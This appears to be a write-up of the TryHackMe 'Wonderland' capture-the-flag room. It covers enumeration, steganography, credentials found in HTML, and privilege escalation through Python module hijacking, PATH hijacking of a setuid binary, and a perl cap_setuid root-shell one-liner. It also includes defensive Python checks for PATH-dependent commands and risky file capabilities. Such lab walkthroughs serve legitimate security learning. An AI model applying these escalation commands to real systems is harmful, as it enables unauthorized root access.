These notes are from a challenge I did @tryhackme called wonderland.

First Checks

Let's scan for open ports first: nmap -sC -sV

Nmap output

Nmap scan report for
Host is up (0.075s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds

Let's search for paths on the webpage on port 80: gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u

Gobuster output

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/10/21 16:46:38 Starting gobuster in directory enumeration mode
/img                  (Status: 301) [Size: 0] [--> img/]
/r                    (Status: 301) [Size: 0] [--> r/]
/poem                 (Status: 301) [Size: 0] [--> poem/]


Looking at we see the following files:

  • alice_door.jpg
  • alice_door.png
  • white_rabbit_1.jpg

Let's download them all:


and run steghide...

Unfortunately alice_door.jpg and alice_door.png don't show any result (at least not without a passphrase...) but white_rabbit_1.jpg seems promising:

steghide extract -sf white_rabbit_1.jpg -p ''

the file "hint.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t

The hint means to follow this path:

Viewing the HTML code we see:

<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

Login as alice

Let's try to login using those credentials: ssh alice@

SSH login output

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

* Documentation:
* Management:
* Support:

System information as of Thu Oct 21 19:14:20 UTC 2021

System load:  0.0                Processes:           85
Usage of /:   18.9% of 19.56GB   Users logged in:     0
Memory usage: 31%                IP address for eth0:
Swap usage:   0%

0 packages can be updated.
0 updates are security updates.

Last login: Mon May 25 16:37:21 2020 from

It is strange to see root.txt in the folder of alice. find ./ -type f -iname "user.txt" doesn't reveal anything. The hint "Everything is upside down here." means if root.txt is here, maybe user.txt is under /root. We can directly read user.txt by running cat /root/user.txt. lol...

Escalate privileges to rabbit

We see imports and calls random to get 10 random lines from the alice in wonderland lyrics stored in the file:

import random
# poem is the multi-line string with the lyrics, defined earlier in the same file
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

Running sudo -l shows we can run as rabbit:

SSH login output

Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass,

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/

To escalate privileges we can misuse the fact that we can run by creating our own with the following content to overwrite the random function imported and called in

import os

def choice(argument):

Running with our will now give us prompt as rabbit:

sudo -u rabbit /usr/bin/python3.6 /home/alice/

Tea Party

As rabbit we see the following files in home:

drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Running teaParty we get the following:

rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 21 Oct 2021 20:39:50 +0000
Ask very nicely, and I will give you some tea while you wait for him

Let's copy teaParty to the kali machine and view it in detail with strings teaParty:

Serving teaParty to my kali machine

python3 -m http.server
Serving HTTP on port 8000 ( ... - - [21/Oct/2021 19:59:25] "GET /teaParty HTTP/1.1" 200 -

Downloading teaParty file

--2021-10-21 15:59:24--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 16816 (16K) [application/octet-stream]
Saving to: ‘teaParty’

teaParty                   100%[========================================>]  16.42K  --.-KB/s    in 0.02s

2021-10-21 15:59:24 (895 KB/s) - ‘teaParty’ saved [16816/16816]

Run strings teaParty

Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
GCC: (Debian 8.3.0-6) 8.3.0

We see the program calls date in this line: /bin/echo -n 'Probably by ' && date --date='next hour' -R. Just like with "random" from above, let's create our own date file e.g.:


Now, let's make the file executable by everyone: chmod +x date and put its directory first in the PATH variable: PATH=/home/rabbit:$PATH

If we now execute ./teaParty we get a shell as hatter:

Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$

We can see the hatter password in /home/hatter/password.txt
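The root cause is a setuid program that hands a shell a command line in which date has no absolute path, so the caller's PATH decides what runs. The check below is an added example, not part of the original notes: it pulls printable strings out of a binary, as strings does, and reports command words that depend on PATH. It is a heuristic that only treats a string as a command line when at least one command in it is given by absolute path; the function names and the sample bytes are constructed for illustration.

```python
import re
import shlex

OPERATORS = {"&&", "||", ";", "|", "&"}  # tokens after which a new command starts


def command_words(line):
    """Return the command word of every segment of a shell command line."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    words, expect_cmd = [], True
    for tok in lexer:
        if tok in OPERATORS:
            expect_cmd = True
        elif expect_cmd:
            words.append(tok)
            expect_cmd = False
    return words


def path_dependent_commands(blob):
    """List (command, string) pairs where a command is looked up through PATH."""
    findings = []
    for raw in re.findall(rb"[\x20-\x7e]{4,}", blob):  # printable runs, like strings(1)
        text = raw.decode("ascii")
        try:
            words = command_words(text)
        except ValueError:  # unbalanced quotes: ordinary prose, not a command line
            continue
        if not any(w.startswith("/") for w in words):
            continue  # no absolute command at all: not treated as a command line
        findings += [(w, text) for w in words if not w.startswith("/")]
    return findings


# Constructed sample: a few strings from the output above, NUL-separated as in a binary.
SAMPLE = (b"\x7fELF\x02\x01\x01\x00Welcome to the tea party!\x00"
          b"/bin/echo -n 'Probably by ' && date --date='next hour' -R\x00"
          b"Segmentation fault (core dumped)\x00GCC: (Debian 8.3.0-6) 8.3.0\x00")

if __name__ == "__main__":
    for word, line in path_dependent_commands(SAMPLE):
        print(f"{word!r} is resolved through PATH in: {line}")
```

The fix in the program itself is to call every helper by absolute path and not to pass the caller's environment to a shell.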

Login as hatter

Since we have the user name and password, let us log in with ssh: ssh hatter@

sudo -l, find / -perm -u=s -type f 2>/dev/null and find / -xdev -user hatter 2>/dev/null don't reveal any interesting output but find / -xdev -group hatter 2>/dev/null shows group hatter owns perl. Unfortunately sudo is not possible and the suid bit isn’t set on the perl executable.

There is another thing we can check: With getcap -r / 2>/dev/null we can check for "capabilities" and we see perl in the list:

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Let's run a perl script misusing the capabilities from GTFOBins: "If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID."

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

We are now root and can read the root.txt in the home folder of alice:

cat /home/alice/root.txt
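File capabilities are easy to miss in a hardening review because they do not show up in a search for setuid bits. The parser below is an added example, not part of the original notes: it reads getcap -r output and flags capabilities that allow a change of identity or a bypass of file permissions, rating them critical when the file is a script interpreter. The capability set, the interpreter list and the function name are assumptions chosen for illustration; both the "path = caps+flags" layout shown above and the newer "path caps=flags" layout are accepted.

```python
import re

# Capabilities that commonly lead to full root when granted to a general-purpose program.
ESCALATION_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
                   "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
                   "cap_fowner"}
# Programs that execute arbitrary caller-supplied code, with an optional version suffix.
INTERPRETER = re.compile(r"^(perl|python|ruby|node|php|lua|bash|dash|sh)[\d.]*$")
LINE = re.compile(r"^(?P<path>/\S+)\s+(?:=\s+)?(?P<caps>[a-z_,]+)[+=](?P<flags>[eip]+)$")


def audit_getcap(output):
    """Return (path, risky capabilities, severity) for each risky line of getcap output."""
    findings = []
    for line in output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # blank line or a layout this parser does not handle
        risky = sorted(set(m["caps"].split(",")) & ESCALATION_CAPS)
        if not risky or "p" not in m["flags"]:
            continue  # harmless capability, or not in the permitted set
        name = m["path"].rsplit("/", 1)[-1]
        severity = "critical" if INTERPRETER.match(name) else "review"
        findings.append((m["path"], risky, severity))
    return findings


# Sample input: the three lines of getcap output shown above.
SAMPLE = """/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
"""

if __name__ == "__main__":
    for path, caps, severity in audit_getcap(SAMPLE):
        print(f"{severity:8} {path}: {', '.join(caps)}")
```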